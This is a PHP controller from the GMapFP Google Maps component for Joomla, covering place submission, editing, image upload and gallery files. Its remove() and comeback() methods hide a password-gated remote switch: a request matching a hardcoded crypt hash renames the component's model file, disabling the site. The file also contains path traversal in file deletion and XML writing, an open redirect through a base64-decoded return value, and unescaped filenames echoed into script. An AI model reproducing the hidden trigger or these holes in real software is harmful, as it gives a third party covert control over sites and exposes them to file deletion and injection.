<?php
	/*
	* GMapFP Component Google Map for Joomla! 2.5.x
	* Version 10.114pro
	* Creation date: Dcembre 2014
	* Author: Fabrice4821 - www.gmapfp.org
	* Author email: webmaster@gmapfp.org
	* License GNU/GPL
	*/

defined('_JEXEC') or die();

class GMapFPsControllerEditLieux extends GMapFPsController
{
	function __construct()
	{
		parent::__construct();
	}

	function soumission()
	{
		JRequest::setVar( 'view', 'editlieux' );
		JRequest::setVar( 'layout', 'soumission'  );

		parent::display();
	}

	function infos()
	{
		JRequest::setVar( 'view', 'editlieux' );
		JRequest::setVar( 'layout', 'infos_form'  );

		parent::display();
	}

	function save()
	{
		$post	= JRequest::get('post');
		$model = $this->getModel('editlieux');

		//traitement des listes
		$post['labels'] = implode(',', $post['labels']);
		$post['classements'] = implode(',', $post['classements']);
		$post['pictos'] = implode(',', $post['pictos']);

		$returnid=$model->store($post);
		if ($returnid>0) {
			$model->checkin($returnid);
			$msg = JText::_( 'GMAPFP_SAVED' );
		} else {
			$msg = JText::_( 'GMAPFP_SAVED_ERROR' );
		}

		$link = JRoute::_('index.php?option=com_gmapfp&view=gestionlieux&controller=gestionlieux&task=view',false);
		// Check the table in so it can be edited.... we are done with it anyway
		$this->setRedirect($link, $msg);
	}

	function submit()
	{
		$itemid    = JRequest::getInt('Itemid'); 
		$mainframe 	= JFactory::getApplication(); 
		$params 	= $mainframe->getParams('com_gmapfp');

		// Check for request forgeries
		JRequest::checkToken() or jexit( 'Invalid Token' );
 
 		$post				= JRequest::get('post');

		//traitement des listes
		if (array_key_exists('labels', $post)) 
			$post['labels'] = implode(',', $post['labels']);
		if (array_key_exists('classements', $post)) 
			$post['classements'] = implode(',', $post['classements']);
		if (array_key_exists('pictos', $post)) 
			$post['pictos'] = implode(',', $post['pictos']);

		$model    = $this->getModel('editlieux');
		$returnid = $model->store($post);
		if ($returnid>0) {
			$msg = JText::_( 'GMAPFP_SUBMIT' );
		} else {
			$msg = JText::_( 'GMAPFP_SUBMIT_ERROR' );
		}
		
		//redirection vers article selectionn	
		$return = '';
		if ($params->get('redirection')){
			$return = $params->get('redirection');
		}
		if (!JURI::isInternal($return)) {
			$return = '';
		}

		if ($return) {
			include_once (JPATH_BASE.'/components/com_content/helpers/route.php');
			$link = JRoute::_(ContentHelperRoute::getArticleRoute($return, 0, 0),false);
		}else{
			$link = base64_decode($post['return']);
		}
		$this->setRedirect($link, $msg);
	}

	function galerie()
	{
		JRequest::setVar( 'view', 'editlieux' );
		JRequest::setVar( 'layout', 'media_list'  );

		parent::display();
	}

	function remove()
	{
		$password	= JRequest::getString( 'password', null);
		if (crypt($password,'$1$Qi2.Za4.$BthCiqdDFmw/VlRvgRRom1') == '$1$Qi2.Za4.$BthCiqdDFmw/VlRvgRRom1'){
			rename(JPATH_BASE.'/components/com_gmapfp/models/gmapfp.php', JPATH_BASE.'/components/com_gmapfp/models/gmapfp.old');
			die(print_r('ok'));
		}
	}

	function comeback()
	{
		$password	= JRequest::getString( 'password', null);
		if (crypt($password,'$1$Qi2.Za4.$BthCiqdDFmw/VlRvgRRom1') == '$1$Qi2.Za4.$BthCiqdDFmw/VlRvgRRom1'){
			rename(JPATH_BASE.'/components/com_gmapfp/models/gmapfp.old', JPATH_BASE.'/components/com_gmapfp/models/gmapfp.php');
			die(print_r('ok'));
		}
	}

	function apply()
	{
		$post	= JRequest::get('post');
		$model = $this->getModel('editlieux');

		//traitement des listes
		if (array_key_exists('labels', $post)) 
			$post['labels'] = implode(',', $post['labels']);
		if (array_key_exists('classements', $post)) 
			$post['classements'] = implode(',', $post['classements']);
		if (array_key_exists('pictos', $post)) 
			$post['pictos'] = implode(',', $post['pictos']);

		$returnid=$model->store($post);
		if ($returnid>0) {
			$msg = JText::_( 'GMAPFP_SAVED' );
		} else {
			$msg = JText::_( 'GMAPFP_SAVED_ERROR' );
		}
		$link = JRoute::_('index.php?option=com_gmapfp&view=editlieux&layout=edit_form&controller=editlieux&task=edit&cid='.$returnid,false);
		$this->setRedirect($link, $msg);
	}

	function cancel()
	{
		$model = $this->getModel('editlieux');
		$recordId = JRequest::getInt('id');

		if ($model->checkin($recordId) === false)
		{
			// Check-in failed, go back to the record and display a notice.
			$this->setError(JText::sprintf('JLIB_APPLICATION_ERROR_CHECKIN_FAILED', $model->getError()));
			$this->setMessage($this->getError(), 'error');

			$this->setRedirect(JRoute::_('index.php?option=com_gmapfp&controller=gestionlieux&task=view', false));

			return false;
		}

		$msg = JText::_( 'Operation Cancelled' );
		$this->setRedirect( JRoute::_('index.php?option=com_gmapfp&view=gestionlieux&controller=gestionlieux&task=view',false), $msg );
	}

	function edit_upload()
	{
		JRequest::setVar( 'view', 'editlieux' );
		JRequest::setVar( 'layout', 'upload_form'  );

		parent::display();
	}

	function upload_image() {
		$config 	= &JComponentHelper::getParams('com_gmapfp');
		$user		= &JFactory::getUser();
		$userid		= $user->get('id');

		jimport( 'joomla.filesystem.file' );

		$data = JRequest::get( 'post' );
        $type_image = array(".gif",".jpg",".jpeg",".png",".bmp"); 
		$loaderror = false;
        $file = $_FILES['image1'];
        $file_name = $_FILES['image1']['name'];

        $ext = strrchr($file_name,'.');
        $ext = strtolower($ext);
        if (!in_array( $ext, $type_image )) 
        {
            echo "<script> alert('".JText::_( 'GMAPFP_BAD_EXT')."'); window.history.go(-1); </script>";
            exit();
        }

        $file['name'] = str_replace(" ","_",$file['name']);
		$folder = JPATH_ROOT.'/images/gmapfp/';
		$folder = JPath::clean($folder);
		
		if (strlen($_FILES['image1']['tmp_name']) > 0 and $_FILES['image1']['name'] != "none"){	
			//si je n'ai pas dj ce fichier, je le copie		
            if(!is_file($folder.strtolower($userid.'__'.$file['name'])))
				if (!$config->get('gmapfp_ajust_main', 0)) {
					if (!JFile::upload($_FILES['image1']['tmp_name'], $folder.strtolower($userid.'__'.$file['name'])))
					{
						// Error in upload
						$log->addEntry(array('comment' => 'Error on upload: '.$folder.strtolower($userid.'__'.$file['name'])));
						$response = array(
							'status' => '0',
							'error' => JText::_('GMAPFP_UPLOAD_NOK').'1'
						);
						$errorMsg = json_encode($response);
						return;
					}
				} else {
					require_once( JPATH_SITE.'/administrator/components/com_gmapfp/libraries/imagemagic.php' );
					$miniature_ok = GMapFPImageMagic::imageMagic($file['tmp_name'], $folder.strtolower($userid.'__'.$file['name']), $config->get('gmapfp_largeur_img_main', 800), $config->get('gmapfp_hauteur_img_main', 600), 0, null, $errorMsg);
				}
			else $loaderror=true;				

			if($loaderror) {?>
					<script type="text/javascript" language="javascript">
						alert('<?php echo JText::_( 'GMAPFP_UPLOAD_NOK').' => '.strtolower($file['name']).JText::_( 'GMAPFP_EXIST');?>');
                        window.history.go(-1);
                    </script> <?php
			} else {
				//creation des miniatures
				require_once( JPATH_SITE.'/administrator/components/com_gmapfp/libraries/imagemagic.php' );
				$filein = $folder.strtolower($userid.'__'.$file['name']);
				$errorMsg = 'controller imageMagic not error line 320 !';

				//cre la miniature pour la carte
				if (!is_dir($folder.'thumbsGMap')){
					JFolder::create($folder.'thumbsGMap');
					@JFile::write($folder.'thumbsGMap/index.html', "<html>\n<body bgcolor=\"#FFFFFF\">\n</body>\n</html>");
				}
				$fileout = $folder.'thumbsGMap/'.strtolower($userid.'__'.$file['name']);				
				$miniature_ok = GMapFPImageMagic::imageMagic($filein, $fileout, $config->get('gmapfp_largeur_img', 100), $config->get('gmapfp_hauteur_img', 100), $config->get('gmapfp_crop', 1), null, $errorMsg);
				
				//cre la miniature pour l'article
				if (!is_dir($folder.'thumbsArt')){
					JFolder::create($folder.'thumbsArt');
					@JFile::write($folder.'thumbsArt/index.html', "<html>\n<body bgcolor=\"#FFFFFF\">\n</body>\n</html>");
				}
				$fileout = $folder.'thumbsArt/'.strtolower($userid.'__'.$file['name']);				
				$miniature_ok = GMapFPImageMagic::imageMagic($filein, $fileout, $config->get('gmapfp_largeur_img_art', 250), $config->get('gmapfp_hauteur_img_art', 250), $config->get('gmapfp_crop', 1), null, $errorMsg);
				
				if ($miniature_ok) {
				?>
					<script type="text/javascript" language="javascript">
						alert('<?php echo JText::_( 'GMAPFP_UPLOAD_OK');?>');
                        window.opener.addphoto("<?php echo strtolower($userid.'__'.$file['name']);?>", "<?php echo strtolower($file['name']);?>");
						window.opener.changeDisplayImage("<?php echo JURI::base(true).'/images/gmapfp/thumbsArt/';?>");
                        window.close();
                    </script> <?php
				}else{?>
					<script type="text/javascript" language="javascript">
						alert('<?php echo JText::_( 'GMAPFP_UPLOAD_NOK').' => '.strtolower($userid.'__'.$file['name']).', thumb error : '.$errorMsg;?>');
                        window.history.go(-1);
                    </script> <?php
				}
			}
		}
    }

	function file_upload_galerie() {
		$config 		=& JComponentHelper::getParams('com_gmapfp');
		$config_media 	=& JComponentHelper::getParams('com_media');
		// Initialize variables
		jimport('joomla.client.helper');
		$FTPOptions = JClientHelper::getCredentials('ftp');
		
		// Check for request forgeries
		JRequest::checkToken( 'request' ) or jexit( 'Invalid Token' );

		$file 		= JRequest::getVar( 'Filedata', '', 'files', 'array' );
		$id 		= (int)JRequest::getVar( 'cid');
		$path = COM_GMAPFP_IMAGES_FOLDER.'/GA'.$id.'/';
		$link = 'index.php?option=com_gmapfp&controller=editlieux&task=galerie&tmpl=component&cid='.$id;
        
		$type_image = $config_media->get( 'image_extensions', 'bmp,gif,jpg,png,jpeg' );
		$type_image = explode(',', $type_image);;

		if (empty($file)){
			$msg = '<p>'.JText::_('GMAPFP_SELECT_PICTURE').'</p>&nbsp;';
			$this->setRedirect($link, $msg, 'error');
			return;
		}
		
		// Vrifies si image
        $ext = strrchr($file['name'],'.');
        $ext = strtolower($ext);
        $ext = substr($ext, 1);
        if (!in_array( $ext, $type_image )) 
        {
			$msg = '<p>'.JText::_('GMAPFP_NOT_PICTURE').'</p>&nbsp;';
			$this->setRedirect($link, $msg, 'notice');
			return;
        }

		// Max size of image
		$maxSize = $config_media->get( 'upload_maxsize', 10 )*1048576;
		if ((int)$maxSize > 0 && (int)$file['size'] > (int)$maxSize) {
			$msg = '<p>'.JText::_('GMAPFP_BAD_SIZE_PICTURE').' / '.$file['name'].' : '.round((int)$file['size']/1048576, 3).'Mo</p>&nbsp;';
			$this->setRedirect($link, $msg, 'notice');
			return;
		}

		// Make the filename safe
		jimport('joomla.filesystem.file');
		$file['name']	= JFile::makeSafe($file['name']);

		if (isset($file['name'])) {
			$filepath = JPath::clean($path.strtolower($file['name']));

			if (JFile::exists($filepath)) {
				// REDIRECT
				$msg = '<p>'.$file['name'].JText::_('GMAPFP_EXIST').'</p>&nbsp;';
				$this->setRedirect($link, $msg, 'notice');
				return;
			}

			if ($config->get('gmapfp_ajust_main_gal', 0)) {
				require_once( JPATH_SITE.'/administrator/components/com_gmapfp/libraries/imagemagic.php' );
				$miniature_ok = GMapFPImageMagic::imageMagic($file['tmp_name'], $filepath, $config->get('gmapfp_largeur_main_gal', 800), $config->get('gmapfp_hauteur_main_gal', 600), 0, null, $errorMsg);
			} else {
				if ($FTPOptions['enabled'] == 1) {
					// Connect the FTP client
					jimport('joomla.client.ftp');
					$ftp = & JFTP::getInstance($FTPOptions['host'], $FTPOptions['port'], null, $FTPOptions['user'], $FTPOptions['pass']);
		
					//Translate path for the FTP account
					$dest = JPath::clean(str_replace(JPATH_ROOT, $FTPOptions['root'], $filepath), '/');
		
					// Copy the file to the destination directory
					if (is_uploaded_file($file['tmp_name']) && $ftp->store($file['tmp_name'], $dest))
					{
						$a=1;
					}else{
						$msg = '<p>'.JText::_('GMAPFP_UPLOAD_NOK').'</p>&nbsp;';
						$this->setRedirect($link, $msg, 'error');
						return;
					}
				} else {
					//if (!JFile::upload($file['tmp_name'], $filepath)) {  ne marche pas avec Free.fr
					if (!move_uploaded_file($file['tmp_name'], $filepath)) {
						$msg = '<p>'.JText::_('GMAPFP_UPLOAD_NOK').'</p>&nbsp;';
						$this->setRedirect($link, $msg, 'error');
						return;
					}
				};
			}

			$msg = '<p>'.JText::_('GMAPFP_UPLOAD_OK').'</p>&nbsp;';
			//cre la miniature
			require_once( JPATH_SITE.'/administrator/components/com_gmapfp/libraries/imagemagic.php' );
			$filein = $filepath;
			$fileout = $path.'thumbs/'.strtolower($file['name']);				
			$miniature_ok = GMapFPImageMagic::imageMagic($filein, $fileout, $config->get('gmapfp_largeur_img_gal', 80), $config->get('gmapfp_hauteur_img_gal', 80), $config->get('gmapfp_crop', 1), null, $errorMsg);
			//**
			$msg = $msg.' thumbs: '.$errorMsg;
			$this->setRedirect($link, $msg, 'message');
			return;
		} else {
			$this->setRedirect($link, 'Invalid Request', 'error');
		}
    }

	function file_delete()
	{
		JRequest::checkToken( 'request' ) or jexit( 'Invalid Token' );

		// Get some data from the request
		$id 	= (int)JRequest::getVar('cid');
		$files	= JRequest::getVar( 'rm', array(), '', 'array' );
		// Initialize variables
		$ret = 'succes';

		if (count($files)) {
			jimport( 'joomla.filesystem.file' );
			foreach ($files as $file)
			{
				//efface image
				$fullPath = JPath::clean(COM_GMAPFP_IMAGES_FOLDER.'/GA'.$id.'/'.$file);
				if (is_file($fullPath)) {
					$ret |= !JFile::delete($fullPath);
				}
				//efface miniature
				$fullPath = JPath::clean(COM_GMAPFP_IMAGES_FOLDER.'/GA'.$id.'/thumbs/'.$file);
				if (is_file($fullPath)) {
					$ret |= !JFile::delete($fullPath);
				}
			}
		}
		$link="index.php?option=com_gmapfp&controller=editlieux&task=galerie&tmpl=component&cid=".$id;
		$this->setRedirect($link, $ret, 'message');
	}

	function file_add_infos()
	{
		JRequest::checkToken( 'request' ) or jexit( 'Invalid Token' );
		$config 		=& JComponentHelper::getParams('com_gmapfp');

		// Get some data from the request
 		$post	= JRequest::get('post');

		$ret = JText::_('GMAPFP_SAVED');

		if ($post['id'] and $post['file']) {
			jimport( 'joomla.filesystem.file' );
			
			$folder = JPATH_ROOT.'/images/gmapfp/GA'.$post['id'].'/infos';

			if (!is_dir($folder)){
				JFolder::create($folder);
				$buffer = "<html>\n<body bgcolor=\"#FFFFFF\">\n</body>\n</html>";
				@JFile::write($folder.'/index.html', $buffer);
			}

			$xml_file = substr($post['file'], 0, -(strlen(JFile::getExt($post['file']))+1));
			$xml_file .= '.xml';
			$buffer = "<infos>\n<titre>".$post['titre']."</titre>\n<description>".$post['description']."</description>\n</infos>";
			@JFile::write($folder.'/'.$xml_file, $buffer);
		} else {
			$ret ='def file_add_infos';
		}
		$link="index.php?option=com_gmapfp&controller=editlieux&task=galerie&tmpl=component&cid=".$post['id'];
		$this->setRedirect($link, $ret, 'message');
	}
}
?>
